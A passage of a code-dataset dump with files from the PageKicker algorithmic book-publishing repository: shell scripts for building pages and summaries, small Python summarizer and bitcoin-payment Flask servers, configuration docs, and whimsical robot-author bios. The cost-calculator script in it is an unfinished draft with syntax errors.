2> /dev/null\n\necho \"newcovercolor is\" $newcovercolor\necho \"coverfontcolor is\" $coverfontcolor\necho \"newcoverfont is \" $newcoverfont\n\nconvert -size 1800x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" \\\n-font \"$newcoverfont\" -gravity center -pointsize 11 caption:\"Visual Summary of $title\" tmp/$uuid/cloudcaption$count.png \n\nconvert tmp/$uuid/cloudcaption$count.png tmp/$uuid/$count\".cloudbase.png\" -append tmp/$uuid/$count.png\n\necho \"built word cloud for chapter \" $count \"to tmp/\"$uuid\"/\"$count\".png\" | tee --append $sfb_log\n\ncat includes/wordcloudpageheader.html > tmp/$uuid/wordcloud.$count.html\n\necho $angbr\"img src=\"$dq$count\".png$dq\" alt=$dq\"Visual Summary\"$dq$endbr >> tmp/$uuid/wordcloud.$count.html\n\n\necho \"now building dingbat page\" | tee --append $sfb_log\n\n\necho $\"A favorite quote from\" \"$editedby\" >> tmp/$uuid/dingbat.$count.html\n\n/usr/games/fortune $fortunedb -s >> tmp/$uuid/dingbat.$count.html\n\necho \"</quote><hr>\" >> tmp/$uuid/dingbat.$count.html\n\necho \"<center>\" >> tmp/$uuid/dingbat.$count.html\n\necho $angbr\"img src=\"$dq$dingbat$dq$slash$endbr >> tmp/$uuid/dingbat.$count.html\n\necho \"</center>\" >> tmp/$uuid/dingbat.$count.html\n\ncat includes/wordcloudpagefooter.html >> tmp/$uuid/dingbat.$count.html\n\t\t\necho \"now assembling pages and chapters into cumulative html\" | tee --append $sfb_log\n\n\necho -n \"<li>\"$description\"</li>\" >> tmp/$uuid/stored-descriptions.html\necho -n \"$description\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's// /g' -e 's/\\\\/ /g' -e 's/|/_/g' >> tmp/$uuid/lsi-stored-descriptions.txt\n\ncat tmp/$uuid/wordcloud.$count.html >> tmp/$uuid/tmp.cumulative.html\n\ncat tmp/$uuid/$count\".html\" >> tmp/$uuid/tmp.cumulative.html\n# cat tmp/$uuid/dingbat.$count.html >> tmp/$uuid/tmp.cumulative.html\n\necho -n \"<li>\"$description\"</li>\" >> tmp/$uuid/stored-descriptions.html\necho -n \"$description\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's// /g' -e 's/\\\\/ /g' -e 's/|/_/g' >> tmp/$uuid/lsi-stored-descriptions.txt\n\n" }, { "alpha_fraction": 0.6681564450263977, "alphanum_fraction": 0.6860335469245911, "avg_line_length": 21.375, "blob_id": "d884f4859e4df46f920d48b2fbef0b45b108307b", "content_id": "bf410fc166771a631956d8fda1d144ef93cab956", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 895, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/conf/fortunes/README", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Contents\n--------\n\n\t1. Installation and usage\n\t2. Availability\n\t3. Acknowledgments\n\t4. Contacting the author\n\n1. Installation and usage\n-------------------------\n\nTo install these fortunes, copy the .dat file to your fortunes directory.\n(possibly /usr/games/lib/fortunes)\n\nTo use it, simply type:\n\nfortune starwars\n\n2. Availability\n---------------\n\nYou can always get the latest version of this fortune file from my website:\nhttp://andi.sunsite.dk/\n\n3. Acknowledgments\n------------------\n\nThis fortunefile was based off a list found at \nhttp://stud1.tuwien.ac.at/~e9327324/Quotes.html which was compiled\nby Roman Kurmanowytsch <[email protected]>\n\nThe entire text is copyrighted by the rightful owners.\n\n4. Contacting the author\n------------------------\n\nWhere author means author of the fortune file as is, and not the text writer\nof Star Wars, of course. Suggestions, questions, comments, patches:\n\nAndreas Gohr <[email protected]>\n" }, { "alpha_fraction": 0.6982162594795227, "alphanum_fraction": 0.7047688364982605, "avg_line_length": 35.62666702270508, "blob_id": "bdf8b06fb05bc00bab743196a6a1da69cbec85bc", "content_id": "37061c43cd5090ad59f8f243406878f2bc57e991", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2747, "license_type": "permissive", "max_line_length": 75, "num_lines": 75, "path": "/scripts_python_3/bin/summarize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Simple Summarizer \n# Copyright (C) 2010-2012 Tristan Havelick \n# Author: Tristan Havelick <[email protected]>\n# URL: <https://github.com/thavelick/summarize/>\n# For license information, see LICENSE.TXT\n\n\"\"\"\nA summarizer based on the algorithm found in Classifier4J by Nick Lothan. \nIn order to summarize a document this algorithm first determines the \nfrequencies of the words in the document. It then splits the document\ninto a series of sentences. Then it creates a summary by including the\nfirst sentence that includes each of the most frequent words. Finally\nsummary's sentences are reordered to reflect that of those in the original \ndocument.\n\"\"\"\n\n##//////////////////////////////////////////////////////\n## Simple Summarizer\n##//////////////////////////////////////////////////////\n\nfrom nltk.probability import FreqDist \nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport nltk.data\n\nclass SimpleSummarizer:\n\n\tdef reorder_sentences( self, output_sentences, input ):\n\t\toutput_sentences.sort( lambda s1, s2:\n\t\t\tinput.find(s1) - input.find(s2) )\n\t\treturn output_sentences\n\t\n\tdef summarize(self, input, num_sentences ):\n\t\t# TODO: allow the caller to specify the tokenizer they want\n\t\t# TODO: allow the user to specify the sentence tokenizer they want\n\t\t\n\t\ttokenizer = RegexpTokenizer('\\w+')\n\t\t\n\t\t# get the frequency of each word in the input\n\t\tbase_words = [word.lower() \n\t\t\tfor word in tokenizer.tokenize(input)]\n\t\twords = [word for word in base_words if word not in stopwords.words()]\n\t\tword_frequencies = FreqDist(words)\n\t\t\n\t\t# now create a set of the most frequent words\n\t\tmost_frequent_words = [pair[0] for pair in \n\t\t\tlist(word_frequencies.items())[:100]]\n\t\t\n\t\t# break the input up into sentences. working_sentences is used \n\t\t# for the analysis, but actual_sentences is used in the results\n\t\t# so capitalization will be correct.\n\t\t\n\t\tsent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n\t\tactual_sentences = sent_detector.tokenize(input)\n\t\tworking_sentences = [sentence.lower() \n\t\t\tfor sentence in actual_sentences]\n\n\t\t# iterate over the most frequent words, and add the first sentence\n\t\t# that inclues each word to the result.\n\t\toutput_sentences = []\n\n\t\tfor word in most_frequent_words:\n\t\t\tfor i in range(0, len(working_sentences)):\n\t\t\t\tif (word in working_sentences[i] \n\t\t\t\t and actual_sentences[i] not in output_sentences):\n\t\t\t\t\toutput_sentences.append(actual_sentences[i])\n\t\t\t\t\tbreak\n\t\t\t\tif len(output_sentences) >= num_sentences: break\n\t\t\tif len(output_sentences) >= num_sentences: break\n\t\t\t\n\t\t# sort the output sentences back to their original order\n\t\toutput_sentences = self.reorder_sentences(output_sentences, input)\n\n\t\t# concatinate the sentences into a single string\n\t\treturn \" \".join(output_sentences)\n" }, { "alpha_fraction": 0.678145706653595, "alphanum_fraction": 0.6933774948120117, "avg_line_length": 23.354839324951172, "blob_id": "165d9c184c89544ff2a2cc62dbd65e08c33ee924", "content_id": "394fd020f2efc1a81e6e3752f4731e59bcb0edcf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 71, "num_lines": 62, "path": "/scripts_python_3/bitcoin/fileserver/server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport sys\nimport json\nimport random\nimport os.path\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import send_from_directory\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# Print error and die if a files directory isn't provided\nif len(sys.argv) != 2:\n print((\"Usage: {} <files_directory>\".format(sys.argv[0])))\n sys.exit(1)\n\ndir_path = os.path.abspath(sys.argv[1])\n\n# get a list of the files in the directory\nfile_list = os.listdir(dir_path)\n\n# simple content model: dictionary of files w/ prices\nfiles = {}\nfor file_id in range(len(file_list)):\n files[file_id+1] = file_list[file_id], random.randrange(3000, 5000)\n\n\n# endpoint to look up files to buy\[email protected]('/files')\ndef file_lookup():\n return json.dumps(files)\n\n\n# return the price of the selected file\ndef get_price_from_request(request):\n id = int(request.args.get('selection'))\n return files[id][1]\n\n\n# machine-payable endpoint that returns selected file if payment made\[email protected]('/buy')\[email protected](get_price_from_request)\ndef buy_file():\n\n # extract selection from client request\n sel = int(request.args.get('selection'))\n\n # check if selection is valid\n if(sel < 1 or sel > len(file_list)):\n return 'Invalid selection.'\n else:\n return send_from_directory(dir_path, file_list[int(sel)-1])\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.7093541026115417, "alphanum_fraction": 0.7104676961898804, "avg_line_length": 24.657142639160156, "blob_id": "42ac5d85d4fdbf88fc12cde2e8bf9be942612fa2", "content_id": "3e3d85a8fe6ebee7b17fbf03edcb5997eaff89cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 898, "license_type": "permissive", "max_line_length": 107, "num_lines": 35, "path": "/scripts/check_for_duplicate_seeds-as-pipe.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\ncd $scriptpath\n\n#clean up previous\n\nrm $scriptpath\"seeds/trends/google_screened.seed\"\n\nrm $scriptpath\"seeds/trends/google_nodupes.seed\"\n\nwhile read i\ndo\nif grep -q \"$i\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\nthen \n\t\n\techo $i \"has already been used to build a book\" | tee --append $LOCAL_DATA\"logs/seed.log\"\n\techo \"\" >> $scriptpath\"seeds/trends/google_nodupes.seed\"\n # figure out how to send an error report to the user here\n\nelse\n\techo $i >> $LOCAL_DATA\"seeds/trends/google_nodupes.seed\"\n\techo \"seed\" $i \"was not a duplicate\" | tee --append $LOCAL_DATA\"logs/seed.log\"\nfi\n\t\n\tdone < seeds/trends/google\n\n# only works for google right now!\n\nsed '/^$/d' $scriptpath\"seeds/trends/google_nodupes.seed\" > $scriptpath\"seeds/trends/google_screened.seed\"\t\n\necho \"finished writing google_screened.seeds file at \" `date +'%m/%d/%y%n %H:%M:%S'` >> logs/seed.log\n\nexit 0\n" }, { "alpha_fraction": 0.664277195930481, "alphanum_fraction": 0.664277195930481, "avg_line_length": 51.3125, "blob_id": "c51f2bf07ee93ecbb3adc4b0b7cb187630013f99", "content_id": "85a12f4c79fb9726f5c931cde87b65a48da9dc8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 837, "license_type": "permissive", "max_line_length": 101, "num_lines": 16, "path": "/scripts/includes/settings.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \" \" > \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"# Settings\" >> \"$TMPDIR$uuid/settings.md\"\necho \"Key parameters are listed here.\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Booktype:** \" >> \"$TMPDIR$uuid/settings.md\"\necho \"$booktype\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Search seeds after screening and deduplication:**\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\ncat $TMPDIR$uuid/seeds/sorted.seedfile | sed G >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Expand seeds via page title strategy?**\" $expand_seeds_to_pages >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\n" }, { "alpha_fraction": 0.8012295365333557, "alphanum_fraction": 0.8012295365333557, "avg_line_length": 161.6666717529297, "blob_id": "01bef57165efdf856dbffcacdefb93b6fe690c5a", "content_id": "ea1e947ab75ad82d04240ec3ef8ed912cd2be3db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 488, "license_type": "permissive", "max_line_length": 371, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Vita_S.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Raised on a country estate in the Lake District, Vita moved to London after her first marriage. She has a long association with gardens and gardening and brings these skills to her curatorial work at Pagekicker. Ms. S. has agreed to guide the compilation of the PageKicker Famous Gardens series and was respobsible for last year's table decorations at the holiday party.\n\nWhen Vita is not in the garden she likes flower arranging, \"but not Ikibana as it is too structured for my taste.\"\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 9, "blob_id": "a47b65668c3b3710d16d1505fc788a0749bed05d", "content_id": "5fad95f4fd7abe94f04375f15150264351ff8e61", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 30, "license_type": "permissive", "max_line_length": 16, "num_lines": 3, "path": "/scripts/managelibrary.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# manage library\n" }, { "alpha_fraction": 0.7626489996910095, "alphanum_fraction": 0.7793377637863159, "avg_line_length": 61.91666793823242, "blob_id": "762904ebc49364498f78bc2abedec3ed81b03b1e", "content_id": "44d54b91d7c3901171c91ee62ce734e4d00f035a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3775, "license_type": "permissive", "max_line_length": 527, "num_lines": 60, "path": "/docs/doc/how_to_customize.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Customizing PageKicker\n\nPageKicker accomplishes customization through a hierarchy of default values and configuration files. All variables and configuration values are set to \"sensible\" defaults that can if desired be overridden. The priority order is as follows.\n\nThe logic in builder.sh beginning\n\n`if shopt -q login_shell\n...\nfi`\n\ndetects whether the user is a login shell or nonlogin shell and whether there is a valid configuration file associated with the current process user; if not it creates one from the default. You may need to create a nonlogin shell config file if you are running the script from a daemon or cron job.\n\n~/.pagekicker/config.txt sets global environment values and the top section of the file MUST BE CUSTOMIZED to provide accurate paths for your particular environment.\n\nscripts/includes/set-variables.sh then reads in default values for all pagekicker-specific system variable and sets up some logging information. Log paths are specified in config.txt.\n\nThe values for config.txt and set-variables can then be overridden by command line parameters provided in the subsequent while : loop which is constructed without getopts (see https://stackoverflow.com/questions/192249/how-do-i-parse-command-line-arguments-in-bash).\n\nSome command line parameters can specify values directly, such as --byline \"Fred Zimmerman\", --booktitle \"Test Book\", --coverfront \"Arial\", --imprintname \"Nimble Books\", and so on.\n\nSome command line parameters specify text or binary files. For example, --seedfile provides a list of \"seeds\" (key phrases) that the system will loop over to construct a book.\n\nAlternately, some command line parameters can specify configuration files that set a variety of additional variables all at once. The --jobprofile parameter specifies a \"jobprofile\" that corresponds to a single robot authorial personality. The default set of jobprofiles are provided in conf/jobprofiles. Subdirectories in jobprofiles/ contain various types of metadata pertaining to the robot author. The file in jobprofiles/robots/ are the \"top level\" and contain both variable values and pointers to other metadata files.\n\nFor example, here is default.jobprofile:\n\n```\nfirstname=\"\"\nmiddlename=\"\"\nlastname=\"Phil73\"\neditedby=$firstname\" \"$middlename\" \"$lastname\nauthorbio=$SFB_HOME\"conf/jobprofiles/authorbios/default.html\"\nfortunedb=\"literature\"\nLSI_import=\"no\"\nBISAC_code=\"none\"\nrows=\"99\"\nfetched_document_format=\"html\"\nmylibrary=\"yes\"\nsigfile=\"default.jpg\"\nadd_imprint_biblio=\"no\" #data too messy for right now\nrobot_location=\"Ann Arbor, Michigan, USA\"\n```\n\nThe authorbio variable points to an html file containing a brief description of the robot author \"Phil 73.\"\n\n```\nThis book was assembled with pride by PageKicker robot <b>Phil 73</b>. Phil was born in the year 3019 of the Third Age and lives in Hobbiton, the Shire. His hobbies include rock climbing, listening to jazz, and tagging crowd-sourced images.<p>\n```\n\nImprint files, stored in jobprofiles/imprints, contain basic info about each imprint, including the imprint's mission statement, copyright declaration, stylistic defaults (in .imprint), and logo. The imprint can be specified at the command line via the --imprint parameter or in the jobprofile for the particular author.\n\n```\nrw-r--r-- 1 fzimmerman CORP\\Domain Users 52360 May 1 2017 pklogo.png\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 132 May 1 2017 pkcopyrightpage.md\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 185 May 1 2017 pagekicker_mission.md\n-rw-r--r-- 1 fzimmerman CORP\\Domain Users 222 May 1 2017 pagekicker.imprint\ndrwxr-xr-x 7 fzimmerman CORP\\Domain Users 238 May 1 2017 .\n```\n\nRoadmap includes a \"$publisher\" variable with associated config files that would \"own\" multiple imprints.\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6586538553237915, "avg_line_length": 14, "blob_id": "d7d7be365698f0a00b96c314c6df1e30560e631d", "content_id": "4b14eabe87574f8579bc39d603c9d962b857280c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "permissive", "max_line_length": 46, "num_lines": 13, "path": "/scripts/bin/cookie-baker.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\r\n\r\n# fortune cookie baker\r\n\r\ncookiename=\"$topic\"_cookies\r\n\r\nperl -w -p -e 's/\\n/\\n\\%\\n/' dough > cookies\r\n\r\nstrfile cookies cookiename\r\n\r\necho \"created fortune cookie file \"$cookiename\r\n\r\nexit 0\r\n" }, { "alpha_fraction": 0.6594594717025757, "alphanum_fraction": 0.6756756901741028, "avg_line_length": 22.125, "blob_id": "13cc24a8981f7b8bbb38d44a128879de7167d07e", "content_id": "e91aefed272855be2fde533b4b5250853a551468", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 555, "license_type": "permissive", "max_line_length": 92, "num_lines": 24, "path": "/scripts/bin/submit_to_seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd /opt/bitnami/apps/magento/htdocs/media/webforms/xml\nfiles=(*) newest=${files[0]}\nfor f in \"${files[@]}\"; do\n if [[ $f -nt $newest ]]; then\n newest=$f\n fi\ndone\n\necho \"found the newest file in xml , it is \" $newest\n\nsubmitted_seed=$(cat $newest | grep '<field_38>' | sed \"s/<field_38>//;s/<\\/field_38>//\") \necho \"submitted seed is \" $submitted_seed\n\necho $submitted_seed > /opt/bitnami/apache2/htdocs/sfb/scripts/seeds/current-seeds\n\necho \"wrote submitted_seed to replace current-seed\"\n\n$scriptpath$SFBversion\n \ncd $USER_HOME\nexit\n0\n" }, { "alpha_fraction": 0.7896551489830017, "alphanum_fraction": 0.8034482598304749, "avg_line_length": 95.66666412353516, "blob_id": "996aac5db91961e723dd1bcc14af0bc093fa1dfc", "content_id": "452660b06e4a45e4523e1d0a660ab17cb034bef5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 290, "license_type": "permissive", "max_line_length": 208, "num_lines": 3, "path": "/conf/jobprofiles/imprints/1001battles/1001battles_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Tell me and I forget. Teach me and I remember. Involve me and I learn. --Benjamin Franklin\n\n1001 Battles is an innovative publisher of military history that uses PageKicker's open source algorithmic publishing platform to create dynamic, always-updated books on the great battles of military history.\n" }, { "alpha_fraction": 0.6532156467437744, "alphanum_fraction": 0.6670870184898376, "avg_line_length": 21.657142639160156, "blob_id": "6ddfd49d93d263e39628b361a2bf157f54898a9f", "content_id": "97a9dabc917238d614ae8e306aec5d8f11c00569", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "permissive", "max_line_length": 52, "num_lines": 35, "path": "/scripts_python_3/bitcoin/bitcoin-sms-server/sms-server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\n\nfrom twilio.rest import TwilioRestClient\nfrom flask import Flask, request\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# create the twilio rest client\nclient = TwilioRestClient(\n os.environ.get('TWILIO_ACCOUNT_SID'),\n os.environ.get('TWILIO_AUTH_TOKEN')\n)\n\n\[email protected]('/send-sms')\[email protected](3000)\ndef send_sms():\n \"\"\"Send an sms for bitcoin\"\"\"\n text = request.args.get('text')\n client.messages.create(\n to=os.environ.get('MY_PHONE_NUMBER'),\n from_=os.environ.get('TWILIO_PHONE_NUMBER'),\n body=text\n )\n return \"Message sent.\"\n\n# set up and run the server\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6226838827133179, "alphanum_fraction": 0.6350364685058594, "avg_line_length": 49.88571548461914, "blob_id": "ed4b294ee24830e3318869bd69533acff95f14d7", "content_id": "9fe59f1ba9d50bf9a52f0f9104b0d5a6cb25882e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1781, "license_type": "permissive", "max_line_length": 122, "num_lines": 35, "path": "/scripts/includes/transect_summarize_ner.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "for file in \"$TMPDIR$uuid/xtarget.\"*\ndo\n\t\t#\"$PYTHON_BIN\" $scriptpath\"bin/nerv3.py\" $file $file\"_nouns.txt\" \"$uuid\"\n\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier \\\n\t\t -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$file\" \\\n\t\t -outputFormat tabbedEntities > \"$file\"_ner.tsv\n\t\techo \"ran NER on $file\"\n\n\n # parse file\n\n\t\tgrep \"LOCATION\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/Places\n\t\tgrep \"PERSON\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/People\n\t\tgrep \"ORGANIZATION\" \"$file\"_ner.tsv | cut -f1 | sort -u >> \"$TMPDIR$uuid\"/Other\n\t cd \"$scriptpath\"\n\n\t\tcat \"$TMPDIR$uuid\"/Places >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_Places\"\n\t cat \"$TMPDIR$uuid\"/People >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_People\"\n\t cat \"$TMPDIR$uuid\"/Other >> \"$TMPDIR\"$uuid\"/\"$sku\".\"$safe_product_name\"_Other\"\n\n\t\techo -n \"python_bin for running PKsum is\" $PYTHON_BIN \"and PYTHON_BIN actually is \"\n\t\t\"$PYTHON_BIN\" --version\n\n\t\t\"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\n\t\tsed -i 's/ \\+ / /g' $file\"_summary.txt\"\n\n\t\tcp $file\"_summary.txt\" $file\"_pp_summary.txt\"\n\t\techo \"ran summarizer on $file\"\n\t\tawk 'length>=50' $file\"_pp_summary.txt\" > \"$TMPDIR\"$uuid/awk.tmp && mv \"$TMPDIR\"$uuid/awk.tmp $file\"_pp_summary.txt\"\n\t\tawk 'length<=4000' $file\"_pp_summary.txt\" > \"$TMPDIR\"$uuid/awk.tmp && mv \"$TMPDIR\"$uuid/awk.tmp $file\"_pp_summary.txt\"\n\t\t#echo \"---end of summary section of 140K bytes---\" >> $file\"_pp_summary.txt\"\n\t\t#echo \"---end of summary section of 140K bytes---\" >> $file\"_summary.txt\"\n\t\tcat $file\"_pp_summary.txt\" | awk '!x[$0]++' >> \"$TMPDIR\"$uuid/pp_summary.txt\n\t\tcat $file\"_summary.txt\" | awk '!x[$0]++' >> \"$TMPDIR\"$uuid/summary.txt\ndone\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 169, "blob_id": "aed6f9c7accc1f49d8814fbd3d1b9a06d46569d1", "content_id": "03230dd0535419793f1ad5176d024d82c8b08ed5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "permissive", "max_line_length": 260, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Sara_72.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Sara has been in Academia most of her programmed life. She is particularly fond of the great philosophers and considers herself a reformed logical Empericist.. At PageKicker she reports on great mathematicians and philosophers and the current state of the Art.\nSara is well known for her Soduku skills among the robo-authors at PageKicker.\n" }, { "alpha_fraction": 0.695652186870575, "alphanum_fraction": 0.695652186870575, "avg_line_length": 21, "blob_id": "4a7b15e360dc555a5113c2baaa8b73054cc302c2", "content_id": "36f27bcb6773a17dd21e9b983cf14e0c3a885511", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "permissive", "max_line_length": 21, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Chris.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This is a test robot. \n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 32, "blob_id": "d8f4ae2ba45c5f6143b112f3986a2663c900fd69", "content_id": "b986500665d35aad12ad1ec1235d90840d5881ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 66, "license_type": "permissive", "max_line_length": 53, "num_lines": 2, "path": "/test/VR_batch.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../../scratch/VR3.csv 1\n" }, { "alpha_fraction": 0.6701613068580627, "alphanum_fraction": 0.7169354557991028, "avg_line_length": 34.25714111328125, "blob_id": "f4f7c68c2959fb97a6915085100680c7901ed0cb", "content_id": "fa460fec58f183f47ce103d061ad497e616becc3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 85, "num_lines": 35, "path": "/scripts/includes/cost-calculator.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#AWS cost variables\n\n# $0.165 per High-CPU Medium Instance (c1.medium) instance-hour (or partial hour)\n\ncpuhour= 0.165\n\n# 0.10 per GB-month of provisioned storage\n\ngbmonth = 0.10\n\nepubbytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.epub`\nmobibytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.mobi`\npdfbytes=`stat -c %s $mediatargetpath$uuid\"/\"$sku.pdf`\n\necho \"epub file size is\" $epubbytes | tee --append $sfb_log\necho \"mobi file size is\" $mobibytes | tee --append $sfb_log\necho \"pdf file size is\" $pdfbytes | tee --append $sfb_log\n\nepubstoragecost=(( %$epubbytes / 1000000000 * $gbmonth ))\nmobistoragecost=(( $mobibytes / 1000000000 * $gbmonth ))\npdfstoragecost=(( $pdfbytes / 1000000000 * $gbmonth ))\nallformatstoragecost=(( $epubstorage + $mobistoragecost + $pdfstoragecost ))\n\necho \"epub storage cost per month is \" $epubstoragecost | tee --append $sfb_log\necho \"mobi storage cost per month is \" $mobistoragecost | tee --append $sfb_log\necho \"pdf storage cost per month is \" $pdfstoragecost | tee --append $sfb_log\necho \"total storage cost per month is \" $allformatstoragecost | tee --append $sfb_log\n\n# $0.10 per 1 million I/O requests\n\nmillionIOrequests = 0.10 \n\n# buildcost = min x cpuhour/60\n\n# gbmonth = bytesize/1000 * gbmonth\n\n\n\n\n\n" }, { "alpha_fraction": 0.720634937286377, "alphanum_fraction": 0.720634937286377, "avg_line_length": 24.15999984741211, "blob_id": "b4e7dd2b5fbb1051818e71240443fd1bd9a67ef2", "content_id": "b7cf263b5805fa4bd45ec7ae732a996e82d59ee1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 630, "license_type": "permissive", "max_line_length": 102, "num_lines": 25, "path": "/scripts/includes/SpecificPage.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# select search API\n\n\t\t\tsearchAPI=\"Wikipedia\"\n\n\t\t\t#gets specific pages that match search term (only)\n\n\n\t\t\t\twikiAPIendpoint=\"http://\"$wikilocale\".wikipedia.org/w/api.php?\"\n\n\t\t\t\twikiAPIaction=\"action=query&prop=revisions&rvprop=content&format=xml&titles=\"$safeseed\n\t\t\n\t\t\n\t\t\t# build the specific page request using the appropriate values for keyword search or link retrieval\n\n\t\t\tsearchurl=$wikiAPIendpoint$wikiAPIaction\n\t\n\t\t\techo $searchurl\n\n\t\t\techo \"submitting search now, searchurl is\" $searchurl | tee --append $sfb_log\n\n\t\t\t# break point\n\t\t\n\t\t\t# submit the search\n\n\t\t\tcurl --silent 